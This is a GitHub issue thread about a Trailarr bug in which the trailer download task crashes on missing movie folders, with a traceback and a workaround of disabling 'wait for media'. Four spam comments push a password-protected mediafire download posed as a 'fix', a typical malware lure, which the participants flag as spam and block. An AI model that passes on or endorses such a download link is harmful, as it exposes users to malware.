### ISSUE TITLE
[Bug] Missing folders causing download task to fail

### ISSUE THREAD

**Issue by Jdiesel87** [nandyalu/trailarr#26]
**Describe the bug**
Radarr is currently setup so that it does not create empty folders and will only create the movie folder when the media has been imported. For movies that have not been released but are in Radarr there are entries but no folders. Trailarr download trailer task fails when it finds an empty folder

**Steps To Reproduce**

**Actual behavior**
A clear and concise description of what is happening.

**Expected behavior**

**Screenshots**

**App Information (please complete the following information):**
 - Base OS: Unraid 6.12.13
- Architecture: (run `dpkg --print-architecture` to find out). [e.g. arm64, amd64]
 - Version [e.g. 22.04]
 - Browser (if related to webpage) [e.g. chrome 127.0.6533.89 (Official Build) (64-bit)]
-Docker v0.1.1-beta
**Additional context**

FileNotFoundError: [Errno 2] No such file or directory: '/Storage/media/movies/Nosferatu ()'

^^^^^^^^^^^^^^^^

for entry in os.scandir(path):

File "/app/backend/core/files_handler.py", line 151, in check_media_exists

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

if not FilesHandler.check_media_exists(db_media.folder_path):

File "/app/backend/core/tasks/download_trailers.py", line 43, in _download_missing_media_trailers

_download_missing_media_trailers(is_movie=True)

File "/app/backend/core/tasks/download_trailers.py", line 89, in download_missing_trailers

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

retval = job.func(*job.args, **job.kwargs)

File "/usr/local/lib/python3.12/site-packages/apscheduler/executors/base.py", line 125, in run_job

Traceback (most recent call last):

2024-08-26T11:43:52-0600 [ERROR|base|L131]: Job "Download Missing Trailers (trigger: interval[1:00:00], next run at: 2024-08-26 12:43:52 CST)" raised an exception

2024-08-26T11:43:52-0600 [INFO|download_trailers|L088]: TrailerDownloadTasks: Downloading missing trailers

2024-08-26T11:43:52-0600 [INFO|base|L123]: Running job "Download Missing Trailers (trigger: interval[1:00:00], next run at: 2024-08-26 12:43:52 CST)" (scheduled at 2024-08-26 11:43:52.172415-06:00)

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jdiesel87** [comment]
WTF is with all the spam?

**Comment by nandyalu** [comment]
Blocked all the spam users!

**Comment by nandyalu** [comment]
@Jdiesel87 did you enable wait for media setting?

**Comment by Jdiesel87** [comment]
> @Jdiesel87 did you enable wait for media setting?

Yes I have wait for media enabled

**Comment by dannyvassallo** [comment]
Also having this problem using on unraid.

**Comment by nandyalu** [comment]
@Jdiesel87 @dannyvassallo have a look at #17. It's related to permissions issues with unraid

**Comment by Jdiesel87** [comment]
I'm not sure that what I'm experiencing is a permission issue. I am able to manually download trailer, which will create a trailers folder and write the trailer file, just fine.

**Comment by dannyvassallo** [comment]
I disabled wait for media and it started working.

**Comment by Jdiesel87** [comment]
Can confirm that disable wait for media fixes this issue.

Upon testing I realized that "wait for media" is not needed in my user case. Originally I expected Emby to pick the folders with only trailers and populate them into the library. This is not the case, at least if trailer sub-folders are used, so I have no issue with downloading the trailers before the media is fully available. 

If you do require further testing on the "wait for media" option I am still available.

**Comment by nandyalu** [comment]
I found out why this is happening... a condition needs to be added in method that checks if media is downloaded before downloading trailer to check and return if folder doesn't already exist.

Please disable the wait for media option for now, will fix this in next release.

@dannyvassallo @Jdiesel87 Appreciate your help in figuring out this!
